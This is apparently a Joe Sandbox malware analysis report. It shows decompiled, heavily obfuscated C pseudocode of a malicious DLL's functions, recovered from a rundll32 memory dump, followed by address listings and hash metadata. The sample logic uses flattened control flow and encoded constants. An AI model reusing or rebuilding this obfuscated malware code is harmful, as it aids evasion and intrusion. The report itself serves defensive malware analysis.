				_v48 = _v48 ^ 0x00766b67;
				_v88 = 0xfc738c;
				_v88 = _v88 << 0xe;
				_v88 = _v88 ^ 0x1ce8da45;
				_v140 = 0x79fdd0;
				_v140 = _v140 >> 0xe;
				_v140 = _v140 * 0x78;
				_v140 = _v140 ^ 0x000f2c53;
				_v64 = 0xd0b1f6;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x000411a2;
				_v200 = 0xaa2240;
				_v200 = _v200 | 0x35f3f2d4;
				_v200 = _v200 + 0x4147;
				_v200 = _v200 + 0xffff1702;
				_v200 = _v200 ^ 0x35f16a60;
				_v52 = 0x980f89;
				_v52 = _v52 ^ 0xc15a5b47;
				_v52 = _v52 ^ 0xc1c323e9;
				_v216 = 0xb7a8b5;
				_v216 = _v216 >> 3;
				_v216 = _v216 ^ 0xa2f7ad91;
				_v216 = _v216 + 0xfffff0a8;
				_v216 = _v216 ^ 0xa2ec62b8;
				_v72 = 0x73581d;
				_v72 = _v72 + 0xffffc838;
				_v72 = _v72 ^ 0x00777119;
				_v164 = 0x873053;
				_v164 = _v164 ^ 0xefe323e3;
				_v164 = _v164 | 0xd91bba05;
				_v164 = _v164 ^ 0xff705bac;
				_v40 = 0xf8d5df;
				_v40 = _v40 ^ 0x79f853d7;
				_v40 = _v40 ^ 0x79053437;
				_v192 = 0x180af0;
				_v192 = _v192 + 0xffff4c14;
				_v192 = _v192 << 8;
				_v192 = _v192 + 0x2aad;
				_v192 = _v192 ^ 0x175759c3;
				_v256 = 0x23b549;
				_v256 = _v256 + 0x5eb6;
				_v256 = _v256 | 0xffb7bbff;
				_v256 = _v256 ^ 0xffb807e9;
				_v176 = 0xc1fdd5;
				_v176 = _v176 >> 0xc;
				_v176 = _v176 | 0x5151af8d;
				_v176 = _v176 ^ 0x515c7a4b;
				_v112 = 0xec5780;
				_v112 = _v112 ^ 0x97b4c021;
				_v112 = _v112 ^ 0x9750bd7e;
				_v180 = 0x591b41;
				_v180 = _v180 + 0x207e;
				_v180 = _v180 + 0xffffc81d;
				_v180 = _v180 ^ 0x005ca8dc;
				_v68 = 0x76fd1d;
				_t675 = 0x5c52c4a;
				_v68 = _v68 | 0x9e2d4356;
				_v68 = _v68 ^ 0x9e728261;
				_v76 = 0xf22a3;
				_v76 = _v76 | 0x9c703035;
				_v76 = _v76 ^ 0x9c7b5f20;
				_v220 = 0x3decab;
				_v220 = _v220 << 8;
				_v220 = _v220 ^ 0x53082a5e;
				_v220 = _v220 >> 0xd;
				_v220 = _v220 ^ 0x0004d715;
				_v84 = 0x6eb476;
				_v84 = _v84 << 0xd;
				_v84 = _v84 ^ 0xd68135de;
				_v124 = 0x458e11;
				_v124 = _v124 | 0x336f5b57;
				_t607 = 0x43;
				_v124 = _v124 / _t607;
				_v124 = _v124 ^ 0x00c97d17;
				_v156 = 0x7cba2c;
				_t608 = 0x4b;
				_v156 = _v156 / _t608;
				_v156 = _v156 | 0x0b494d21;
				_v156 = _v156 ^ 0x0b48f5d9;
				_v36 = 0x519404;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0x5195ba3f;
				_v168 = 0xf13e55;
				_v168 = _v168 | 0x95edbe5f;
				_v168 = _v168 ^ 0xd6548190;
				_v168 = _v168 ^ 0x43a3dbfd;
				_v188 = 0xdd4a71;
				_v188 = _v188 + 0xffff5bb0;
				_v188 = _v188 >> 0xb;
				_v188 = _v188 >> 6;
				_v188 = _v188 ^ 0x000a03ec;
				_v196 = 0x58b29f;
				_t609 = 0x22;
				_v196 = _v196 / _t609;
				_v196 = _v196 + 0xffff713e;
				_v196 = _v196 + 0xffff146a;
				_v196 = _v196 ^ 0x000c9f67;
				_v212 = 0xc056c;
				_t610 = 0x45;
				_v212 = _v212 * 0x51;
				_v212 = _v212 >> 0xc;
				_v212 = _v212 / _t610;
				_v212 = _v212 ^ 0x0007774b;
				while(1) {
					L1:
					_t566 = 0x6c6f684;
					while(1) {
						L2:
						_t611 = 0x92c3a26;
						while(1) {
							L3:
							do {
								while(1) {
									L4:
									_t685 = _t596 - _t675;
									if(_t685 > 0) {
										break;
									}
									if(_t685 == 0) {
										E00386BC6(_v124, _v32, _v156);
										_t596 = 0x4bc1ff4;
										goto L1;
									} else {
										if(_t596 == 0x1d3710) {
											_t596 = 0x6d0da1a;
											continue;
										} else {
											if(_t596 == 0x19992af) {
												_push(_t611);
												_push(_t611);
												_t573 = E00377FF2(_v16);
												__eflags = _t573;
												_v20 = _t573;
												_t660 = 0x19c2787;
												_t596 =  !=  ? 0x19c2787 : 0x87f6c1b;
												_t566 = 0x6c6f684;
												_t611 = 0x92c3a26;
												continue;
											} else {
												if(_t596 == _t660) {
													_t575 = E00387B05(_v16,  &_v32, _v28, _v216, _v72, _v164, _v248, _v40, _v80, _t611, _v192, _v256, _v20);
													_t682 =  &(_t682[0xc]);
													__eflags = _t575 - _v240;
													_t611 = 0x92c3a26;
													_t566 = 0x6c6f684;
													_t596 =  ==  ? 0x92c3a26 : 0x4bc1ff4;
													goto L3;
												} else {
													if(_t596 == 0x489cb15) {
														_push(_v148);
														_push(_v44);
														_t577 = E0038DCF7(_v104, 0x3718b4, __eflags);
														_pop(_t633);
														__eflags = E00390B68(_t577,  &_v12, _v224, _v96, _t633,  &_v16, _v132, _v264, _v208, _v56, _v28, _v172) - _v116;
														_t596 =  ==  ? 0x19992af : 0x87f6c1b;
														E0037A8B0(_v48, _t577, _v88);
														_t677 = _v24;
														_t682 =  &(_t682[0xb]);
														L24:
														_t566 = 0x6c6f684;
														_t611 = 0x92c3a26;
														_t660 = 0x19c2787;
														goto L25;
													} else {
														if(_t596 != 0x4bc1ff4) {
															goto L25;
														} else {
															E00388519(_v36, _v168, _v20);
															_t596 = 0x87f6c1b;
															while(1) {
																L1:
																_t566 = 0x6c6f684;
																L2:
																_t611 = 0x92c3a26;
																L3:
																goto L4;
															}
														}
													}
												}
											}
										}
									}
									L28:
									return _t680;
								}
								__eflags = _t596 - _t566;
								if(_t596 == _t566) {
									_t567 = E0038828A(_v68, _v76, _v220, _t677, _v120, 0x20, _v84, _v32);
									_t682 =  &(_t682[6]);
									_t596 = _t675;
									__eflags = _t567 - _v60;
									_t680 =  ==  ? 1 : _t680;
									goto L24;
								} else {
									__eflags = _t596 - 0x6d0da1a;
									if(__eflags == 0) {
										_push(_v272);
										_push(_v160);
										_t585 = E0038DCF7(_v268, 0x371884, __eflags);
										_push(_v152);
										_push(_v108);
										_t588 = E00379462(_t585, _v260,  &_v28, E0038DCF7(_v100, 0x371814, __eflags), _v92, _v144);
										_t682 =  &(_t682[9]);
										__eflags = _t588 - _v244;
										_t596 =  ==  ? 0x489cb15 : 0x822e036;
										E0037A8B0(_v228, _t585, _v236);
										E0037A8B0(_v128, _t586, _v136);
										_t677 = _v24;
										_t675 = 0x5c52c4a;
										goto L24;
									} else {
										__eflags = _t596 - 0x87f6c1b;
										if(_t596 == 0x87f6c1b) {
											E0037957D(_v28, _v188, _v196, _v204, _v212);
										} else {
											__eflags = _t596 - _t611;
											if(_t596 != _t611) {
												goto L25;
											} else {
												_t594 = E0037A81D(_v32, _a4, _v176, _v112, _v232, _a20, _v180);
												_t682 =  &(_t682[5]);
												__eflags = _t594 - _v184;
												_t566 = 0x6c6f684;
												_t596 =  ==  ? 0x6c6f684 : _t675;
												goto L2;
											}
										}
									}
								}
								goto L28;
								L25:
								__eflags = _t596 - 0x822e036;
							} while (__eflags != 0);
							goto L28;
						}
					}
				}
			}

































































































                                                                                                                                                            0x0038ae77
                                                                                                                                                            0x0038ae7e
                                                                                                                                                            0x0038ae80
                                                                                                                                                            0x0038ae87
                                                                                                                                                            0x0038ae8e
                                                                                                                                                            0x0038ae90
                                                                                                                                                            0x0038ae97
                                                                                                                                                            0x0038ae9e
                                                                                                                                                            0x0038ae9f
                                                                                                                                                            0x0038aea0
                                                                                                                                                            0x0038aea5
                                                                                                                                                            0x0038aeb0
                                                                                                                                                            0x0038aeb2
                                                                                                                                                            0x0038aeb9
                                                                                                                                                            0x0038aebc
                                                                                                                                                            0x0038aec9
                                                                                                                                                            0x0038aed4
                                                                                                                                                            0x0038aed9
                                                                                                                                                            0x0038aee1
                                                                                                                                                            0x0038aeec
                                                                                                                                                            0x0038aefa
                                                                                                                                                            0x0038aeff
                                                                                                                                                            0x0038af05
                                                                                                                                                            0x0038af0d
                                                                                                                                                            0x0038af12
                                                                                                                                                            0x0038af1a
                                                                                                                                                            0x0038af22
                                                                                                                                                            0x0038af2a
                                                                                                                                                            0x0038af37
                                                                                                                                                            0x0038af38
                                                                                                                                                            0x0038af3c
                                                                                                                                                            0x0038af44
                                                                                                                                                            0x0038af4f
                                                                                                                                                            0x0038af57
                                                                                                                                                            0x0038af62
                                                                                                                                                            0x0038af6a
                                                                                                                                                            0x0038af6f
                                                                                                                                                            0x0038af73
                                                                                                                                                            0x0038af7b
                                                                                                                                                            0x0038af83
                                                                                                                                                            0x0038af8b
                                                                                                                                                            0x0038af9e
                                                                                                                                                            0x0038afa5
                                                                                                                                                            0x0038afb0
                                                                                                                                                            0x0038afb8
                                                                                                                                                            0x0038afc0
                                                                                                                                                            0x0038afc8
                                                                                                                                                            0x0038afd0
                                                                                                                                                            0x0038afd8
                                                                                                                                                            0x0038afe0
                                                                                                                                                            0x0038afe8
                                                                                                                                                            0x0038aff0
                                                                                                                                                            0x0038aff5
                                                                                                                                                            0x0038affd
                                                                                                                                                            0x0038b00a
                                                                                                                                                            0x0038b00e
                                                                                                                                                            0x0038b013
                                                                                                                                                            0x0038b01b
                                                                                                                                                            0x0038b026
                                                                                                                                                            0x0038b037
                                                                                                                                                            0x0038b03e
                                                                                                                                                            0x0038b049
                                                                                                                                                            0x0038b054
                                                                                                                                                            0x0038b05f
                                                                                                                                                            0x0038b06a
                                                                                                                                                            0x0038b072
                                                                                                                                                            0x0038b077
                                                                                                                                                            0x0038b07e
                                                                                                                                                            0x0038b086
                                                                                                                                                            0x0038b08e
                                                                                                                                                            0x0038b096
                                                                                                                                                            0x0038b09e
                                                                                                                                                            0x0038b0ac
                                                                                                                                                            0x0038b0b1
                                                                                                                                                            0x0038b0b7
                                                                                                                                                            0x0038b0bf
                                                                                                                                                            0x0038b0ca
                                                                                                                                                            0x0038b0d2
                                                                                                                                                            0x0038b0da
                                                                                                                                                            0x0038b0e5
                                                                                                                                                            0x0038b0ed
                                                                                                                                                            0x0038b0fa
                                                                                                                                                            0x0038b0fb
                                                                                                                                                            0x0038b0ff
                                                                                                                                                            0x0038b103
                                                                                                                                                            0x0038b10b
                                                                                                                                                            0x0038b116
                                                                                                                                                            0x0038b11e
                                                                                                                                                            0x0038b129
                                                                                                                                                            0x0038b134
                                                                                                                                                            0x0038b13f
                                                                                                                                                            0x0038b14a
                                                                                                                                                            0x0038b155
                                                                                                                                                            0x0038b160
                                                                                                                                                            0x0038b16b
                                                                                                                                                            0x0038b176
                                                                                                                                                            0x0038b17e
                                                                                                                                                            0x0038b186
                                                                                                                                                            0x0038b18b
                                                                                                                                                            0x0038b193
                                                                                                                                                            0x0038b19b
                                                                                                                                                            0x0038b1a3
                                                                                                                                                            0x0038b1a8
                                                                                                                                                            0x0038b1b0
                                                                                                                                                            0x0038b1b8
                                                                                                                                                            0x0038b1c0
                                                                                                                                                            0x0038b1cb
                                                                                                                                                            0x0038b1d3
                                                                                                                                                            0x0038b1de
                                                                                                                                                            0x0038b1e6
                                                                                                                                                            0x0038b1ee
                                                                                                                                                            0x0038b1fb
                                                                                                                                                            0x0038b1ff
                                                                                                                                                            0x0038b207
                                                                                                                                                            0x0038b20f
                                                                                                                                                            0x0038b21c
                                                                                                                                                            0x0038b220
                                                                                                                                                            0x0038b228
                                                                                                                                                            0x0038b233
                                                                                                                                                            0x0038b23b
                                                                                                                                                            0x0038b246
                                                                                                                                                            0x0038b251
                                                                                                                                                            0x0038b265
                                                                                                                                                            0x0038b26c
                                                                                                                                                            0x0038b274
                                                                                                                                                            0x0038b27f
                                                                                                                                                            0x0038b28a
                                                                                                                                                            0x0038b295
                                                                                                                                                            0x0038b2a0
                                                                                                                                                            0x0038b2b3
                                                                                                                                                            0x0038b2ba
                                                                                                                                                            0x0038b2c5
                                                                                                                                                            0x0038b2d8
                                                                                                                                                            0x0038b2df
                                                                                                                                                            0x0038b2ea
                                                                                                                                                            0x0038b2f5
                                                                                                                                                            0x0038b300
                                                                                                                                                            0x0038b30b
                                                                                                                                                            0x0038b316
                                                                                                                                                            0x0038b321
                                                                                                                                                            0x0038b329
                                                                                                                                                            0x0038b331
                                                                                                                                                            0x0038b33c
                                                                                                                                                            0x0038b344
                                                                                                                                                            0x0038b34c
                                                                                                                                                            0x0038b354
                                                                                                                                                            0x0038b35c
                                                                                                                                                            0x0038b364
                                                                                                                                                            0x0038b36c
                                                                                                                                                            0x0038b374
                                                                                                                                                            0x0038b37c
                                                                                                                                                            0x0038b384
                                                                                                                                                            0x0038b38c
                                                                                                                                                            0x0038b397
                                                                                                                                                            0x0038b3a2
                                                                                                                                                            0x0038b3ad
                                                                                                                                                            0x0038b3b5
                                                                                                                                                            0x0038b3bd
                                                                                                                                                            0x0038b3c5
                                                                                                                                                            0x0038b3cd
                                                                                                                                                            0x0038b3d8
                                                                                                                                                            0x0038b3e3
                                                                                                                                                            0x0038b3ee
                                                                                                                                                            0x0038b3f9
                                                                                                                                                            0x0038b401
                                                                                                                                                            0x0038b40c
                                                                                                                                                            0x0038b417
                                                                                                                                                            0x0038b427
                                                                                                                                                            0x0038b42e
                                                                                                                                                            0x0038b439
                                                                                                                                                            0x0038b444
                                                                                                                                                            0x0038b44c
                                                                                                                                                            0x0038b457
                                                                                                                                                            0x0038b45f
                                                                                                                                                            0x0038b467
                                                                                                                                                            0x0038b46f
                                                                                                                                                            0x0038b477
                                                                                                                                                            0x0038b47f
                                                                                                                                                            0x0038b48a
                                                                                                                                                            0x0038b495
                                                                                                                                                            0x0038b4a0
                                                                                                                                                            0x0038b4a8
                                                                                                                                                            0x0038b4ad
                                                                                                                                                            0x0038b4b5
                                                                                                                                                            0x0038b4bd
                                                                                                                                                            0x0038b4c5
                                                                                                                                                            0x0038b4d0
                                                                                                                                                            0x0038b4db
                                                                                                                                                            0x0038b4e6
                                                                                                                                                            0x0038b4ee
                                                                                                                                                            0x0038b4f6
                                                                                                                                                            0x0038b4fe
                                                                                                                                                            0x0038b506
                                                                                                                                                            0x0038b511
                                                                                                                                                            0x0038b51c
                                                                                                                                                            0x0038b527
                                                                                                                                                            0x0038b52f
                                                                                                                                                            0x0038b537
                                                                                                                                                            0x0038b53c
                                                                                                                                                            0x0038b544
                                                                                                                                                            0x0038b54c
                                                                                                                                                            0x0038b554
                                                                                                                                                            0x0038b55c
                                                                                                                                                            0x0038b564
                                                                                                                                                            0x0038b56c
                                                                                                                                                            0x0038b574
                                                                                                                                                            0x0038b579
                                                                                                                                                            0x0038b581
                                                                                                                                                            0x0038b589
                                                                                                                                                            0x0038b594
                                                                                                                                                            0x0038b59f
                                                                                                                                                            0x0038b5aa
                                                                                                                                                            0x0038b5b2
                                                                                                                                                            0x0038b5ba
                                                                                                                                                            0x0038b5c2
                                                                                                                                                            0x0038b5cc
                                                                                                                                                            0x0038b5d7
                                                                                                                                                            0x0038b5dc
                                                                                                                                                            0x0038b5e7
                                                                                                                                                            0x0038b5f2
                                                                                                                                                            0x0038b5fd
                                                                                                                                                            0x0038b608
                                                                                                                                                            0x0038b613
                                                                                                                                                            0x0038b61b
                                                                                                                                                            0x0038b620
                                                                                                                                                            0x0038b628
                                                                                                                                                            0x0038b62d
                                                                                                                                                            0x0038b635
                                                                                                                                                            0x0038b640
                                                                                                                                                            0x0038b648
                                                                                                                                                            0x0038b653
                                                                                                                                                            0x0038b65e
                                                                                                                                                            0x0038b672
                                                                                                                                                            0x0038b677
                                                                                                                                                            0x0038b680
                                                                                                                                                            0x0038b68b
                                                                                                                                                            0x0038b69d
                                                                                                                                                            0x0038b6a2
                                                                                                                                                            0x0038b6ab
                                                                                                                                                            0x0038b6b6
                                                                                                                                                            0x0038b6c1
                                                                                                                                                            0x0038b6cc
                                                                                                                                                            0x0038b6d4
                                                                                                                                                            0x0038b6df
                                                                                                                                                            0x0038b6e7
                                                                                                                                                            0x0038b6ef
                                                                                                                                                            0x0038b6f7
                                                                                                                                                            0x0038b6ff
                                                                                                                                                            0x0038b707
                                                                                                                                                            0x0038b70f
                                                                                                                                                            0x0038b714
                                                                                                                                                            0x0038b719
                                                                                                                                                            0x0038b721
                                                                                                                                                            0x0038b72d
                                                                                                                                                            0x0038b732
                                                                                                                                                            0x0038b738
                                                                                                                                                            0x0038b740
                                                                                                                                                            0x0038b748
                                                                                                                                                            0x0038b750
                                                                                                                                                            0x0038b75d
                                                                                                                                                            0x0038b75e
                                                                                                                                                            0x0038b762
                                                                                                                                                            0x0038b76d
                                                                                                                                                            0x0038b771
                                                                                                                                                            0x0038b779
                                                                                                                                                            0x0038b779
                                                                                                                                                            0x0038b779
                                                                                                                                                            0x0038b77e
                                                                                                                                                            0x0038b77e
                                                                                                                                                            0x0038b77e
                                                                                                                                                            0x0038b783
                                                                                                                                                            0x0038b783
                                                                                                                                                            0x0038b788
                                                                                                                                                            0x0038b788
                                                                                                                                                            0x0038b788
                                                                                                                                                            0x0038b788
                                                                                                                                                            0x0038b78a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038b790
                                                                                                                                                            0x0038b969
                                                                                                                                                            0x0038b96f
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038b796
                                                                                                                                                            0x0038b79c
                                                                                                                                                            0x0038b94a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038b7a2
                                                                                                                                                            0x0038b7a8
                                                                                                                                                            0x0038b91c
                                                                                                                                                            0x0038b91d
                                                                                                                                                            0x0038b91e
                                                                                                                                                            0x0038b924
                                                                                                                                                            0x0038b926
                                                                                                                                                            0x0038b933
                                                                                                                                                            0x0038b938
                                                                                                                                                            0x0038b93b
                                                                                                                                                            0x0038b940
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038b7ae
                                                                                                                                                            0x0038b7b0
                                                                                                                                                            0x0038b8dc
                                                                                                                                                            0x0038b8e3
                                                                                                                                                            0x0038b8ef
                                                                                                                                                            0x0038b8f1
                                                                                                                                                            0x0038b8f6
                                                                                                                                                            0x0038b8fb
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038b7b6
                                                                                                                                                            0x0038b7bc
                                                                                                                                                            0x0038b7e9
                                                                                                                                                            0x0038b7f5
                                                                                                                                                            0x0038b803
                                                                                                                                                            0x0038b809
                                                                                                                                                            0x0038b866
                                                                                                                                                            0x0038b874
                                                                                                                                                            0x0038b877
                                                                                                                                                            0x0038b87c
                                                                                                                                                            0x0038b883
                                                                                                                                                            0x0038bada
                                                                                                                                                            0x0038bada
                                                                                                                                                            0x0038badf
                                                                                                                                                            0x0038bae4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038b7be
                                                                                                                                                            0x0038b7c4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038b7ca
                                                                                                                                                            0x0038b7dc
                                                                                                                                                            0x0038b7e2
                                                                                                                                                            0x0038b779
                                                                                                                                                            0x0038b779
                                                                                                                                                            0x0038b779
                                                                                                                                                            0x0038b77e
                                                                                                                                                            0x0038b77e
                                                                                                                                                            0x0038b783
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038b783
                                                                                                                                                            0x0038b779
                                                                                                                                                            0x0038b7c4
                                                                                                                                                            0x0038b7bc
                                                                                                                                                            0x0038b7b0
                                                                                                                                                            0x0038b7a8
                                                                                                                                                            0x0038b79c
                                                                                                                                                            0x0038bb18
                                                                                                                                                            0x0038bb22
                                                                                                                                                            0x0038bb22
                                                                                                                                                            0x0038b979
                                                                                                                                                            0x0038b97b
                                                                                                                                                            0x0038babf
                                                                                                                                                            0x0038bad0
                                                                                                                                                            0x0038bad3
                                                                                                                                                            0x0038bad5
                                                                                                                                                            0x0038bad7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038b981
                                                                                                                                                            0x0038b981
                                                                                                                                                            0x0038b987
                                                                                                                                                            0x0038b9e7
                                                                                                                                                            0x0038b9f0
                                                                                                                                                            0x0038b9fb
                                                                                                                                                            0x0038ba00
                                                                                                                                                            0x0038ba0e
                                                                                                                                                            0x0038ba44
                                                                                                                                                            0x0038ba4b
                                                                                                                                                            0x0038ba57
                                                                                                                                                            0x0038ba68
                                                                                                                                                            0x0038ba6b
                                                                                                                                                            0x0038ba81
                                                                                                                                                            0x0038ba86
                                                                                                                                                            0x0038ba8d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038b989
                                                                                                                                                            0x0038b989
                                                                                                                                                            0x0038b98f
                                                                                                                                                            0x0038bb0e
                                                                                                                                                            0x0038b995
                                                                                                                                                            0x0038b995
                                                                                                                                                            0x0038b997
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038b99d
                                                                                                                                                            0x0038b9c8
                                                                                                                                                            0x0038b9cf
                                                                                                                                                            0x0038b9d8
                                                                                                                                                            0x0038b9da
                                                                                                                                                            0x0038b9df
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038b9df
                                                                                                                                                            0x0038b997
                                                                                                                                                            0x0038b98f
                                                                                                                                                            0x0038b987
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038bae9
                                                                                                                                                            0x0038bae9
                                                                                                                                                            0x0038bae9
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038baf5
                                                                                                                                                            0x0038b783
                                                                                                                                                            0x0038b77e

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: &:,$&:,$&:,$&:,$/i=$GA$Kz\Q$W[o3$_}+$gkv$v$(a$ve$~ $#$1P
                                                                                                                                                            • API String ID: 0-1587349264
                                                                                                                                                            • Opcode ID: 314c22356beea9c2a94451da954d1c86e641ba97f99c6451c78b34a0886824e9
                                                                                                                                                            • Instruction ID: 51d0813de64ffbc601e1904fbfb90ea44ac3c9f7201cd0bf0442f72fde0d0b8f
                                                                                                                                                            • Opcode Fuzzy Hash: 314c22356beea9c2a94451da954d1c86e641ba97f99c6451c78b34a0886824e9
                                                                                                                                                            • Instruction Fuzzy Hash: B15210711093819FD7B9CF61C58AB8BBBE2BBC4304F10891DE6DA96260D7B18949CF53
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00385CC4 Relevance: 16.7, Strings: 13, Instructions: 434COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                            			E00385CC4() {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t481;
				signed int _t496;
				void* _t499;
				intOrPtr _t503;
				void* _t539;
				signed int _t550;
				signed int _t551;
				signed int _t552;
				intOrPtr _t553;
				intOrPtr* _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t567;
				signed int* _t568;
				void* _t572;

				_t568 =  &_v1764;
				_v1576 = 0x9a4c1d;
				_v1596 = _v1596 & 0x00000000;
				asm("stosd");
				_t499 = 0x9b91574;
				asm("stosd");
				asm("stosd");
				_v1684 = 0xe59dc4;
				_v1684 = _v1684 | 0xd0a48cbc;
				_v1684 = _v1684 + 0xffff2e59;
				_v1684 = _v1684 ^ 0xd0e4cc7c;
				_v1752 = 0x51b4b3;
				_v1752 = _v1752 ^ 0x5d9a17a0;
				_t550 = 0xb;
				_t555 = 0x76;
				_v1752 = _v1752 * 0xb;
				_v1752 = _v1752 ^ 0x54bb96eb;
				_v1752 = _v1752 ^ 0x53749705;
				_v1632 = 0xaf6c30;
				_v1632 = _v1632 << 6;
				_v1632 = _v1632 ^ 0x2bdb0c02;
				_v1720 = 0x499d0c;
				_v1720 = _v1720 | 0xb1a117f5;
				_v1720 = _v1720 / _t550;
				_v1720 = _v1720 + 0x97c7;
				_v1720 = _v1720 ^ 0x102d1aad;
				_v1704 = 0xc8e3b3;
				_v1704 = _v1704 * 0x32;
				_v1704 = _v1704 ^ 0x0819b8db;
				_v1704 = _v1704 | 0x44ca091a;
				_v1704 = _v1704 ^ 0x6fefc93f;
				_v1668 = 0xa62014;
				_v1668 = _v1668 | 0xeabb5dd4;
				_v1668 = _v1668 * 0x68;
				_v1668 = _v1668 ^ 0x5dcb1e30;
				_v1744 = 0xf6f234;
				_v1744 = _v1744 * 0x2a;
				_v1744 = _v1744 ^ 0x80b741fb;
				_v1744 = _v1744 / _t555;
				_v1744 = _v1744 ^ 0x0165dd5f;
				_v1584 = 0x312e96;
				_v1584 = _v1584 + 0xffff2d5f;
				_v1584 = _v1584 ^ 0x003c0d9d;
				_v1712 = 0xa058cf;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 >> 8;
				_t556 = 0x70;
				_v1712 = _v1712 / _t556;
				_v1712 = _v1712 ^ 0x000e60b1;
				_v1624 = 0xe892f9;
				_v1624 = _v1624 | 0x8c579b60;
				_v1624 = _v1624 ^ 0x8cfff2b4;
				_v1616 = 0xaf548d;
				_v1616 = _v1616 << 0xe;
				_v1616 = _v1616 ^ 0xd52eab36;
				_v1732 = 0xb05ea2;
				_v1732 = _v1732 * 0x22;
				_t557 = 0x7e;
				_v1732 = _v1732 / _t557;
				_t558 = 0x6e;
				_v1732 = _v1732 / _t558;
				_v1732 = _v1732 ^ 0x000d3439;
				_v1592 = 0x913a71;
				_v1592 = _v1592 + 0xffff7440;
				_v1592 = _v1592 ^ 0x0095b07c;
				_v1696 = 0x599322;
				_v1696 = _v1696 / _t550;
				_v1696 = _v1696 ^ 0xb13d8f34;
				_v1696 = _v1696 ^ 0xb1384542;
				_v1644 = 0xa16dfa;
				_v1644 = _v1644 ^ 0xe1099bcb;
				_v1644 = _v1644 ^ 0xe1a9d34e;
				_v1648 = 0xb4e11f;
				_v1648 = _v1648 ^ 0x38d2ca48;
				_v1648 = _v1648 ^ 0x386e0f93;
				_v1608 = 0x5a22b;
				_t559 = 0x77;
				_t551 = 0x6a;
				_v1608 = _v1608 * 0x7a;
				_v1608 = _v1608 ^ 0x02a61538;
				_v1680 = 0xefbd86;
				_v1680 = _v1680 ^ 0x59656a46;
				_v1680 = _v1680 + 0xffff500f;
				_v1680 = _v1680 ^ 0x598ded80;
				_v1724 = 0x3ee43e;
				_v1724 = _v1724 + 0x7543;
				_v1724 = _v1724 ^ 0x2e29824a;
				_v1724 = _v1724 + 0xffff57f4;
				_v1724 = _v1724 ^ 0x2e1fc8aa;
				_v1580 = 0xa6d208;
				_v1580 = _v1580 | 0x568c9bfe;
				_v1580 = _v1580 ^ 0x56ae214d;
				_v1636 = 0x6d5924;
				_v1636 = _v1636 ^ 0x925c239d;
				_v1636 = _v1636 ^ 0x923215a4;
				_v1664 = 0x695adc;
				_v1664 = _v1664 / _t559;
				_v1664 = _v1664 + 0x9e91;
				_v1664 = _v1664 ^ 0x000b7b12;
				_v1728 = 0x27fcd;
				_v1728 = _v1728 << 7;
				_v1728 = _v1728 >> 0xd;
				_v1728 = _v1728 / _t551;
				_v1728 = _v1728 ^ 0x000e8750;
				_v1660 = 0x324e38;
				_t560 = 0xd;
				_v1660 = _v1660 / _t560;
				_v1660 = _v1660 ^ 0xc6795c1b;
				_v1660 = _v1660 ^ 0xc67cbc2f;
				_v1672 = 0xd5264d;
				_v1672 = _v1672 ^ 0x5df7965f;
				_v1672 = _v1672 << 0xa;
				_v1672 = _v1672 ^ 0x8ac02156;
				_v1760 = 0x48e2ee;
				_t213 =  &_v1760; // 0x48e2ee
				_t561 = 0x2d;
				_v1760 =  *_t213 / _t561;
				_v1760 = _v1760 ^ 0xd2c1db30;
				_v1760 = _v1760 ^ 0xa53e2936;
				_v1760 = _v1760 ^ 0x77fe21cd;
				_v1740 = 0xf20c88;
				_v1740 = _v1740 / _t551;
				_v1740 = _v1740 | 0xd96c60ad;
				_v1740 = _v1740 << 0xc;
				_v1740 = _v1740 ^ 0xe68a7191;
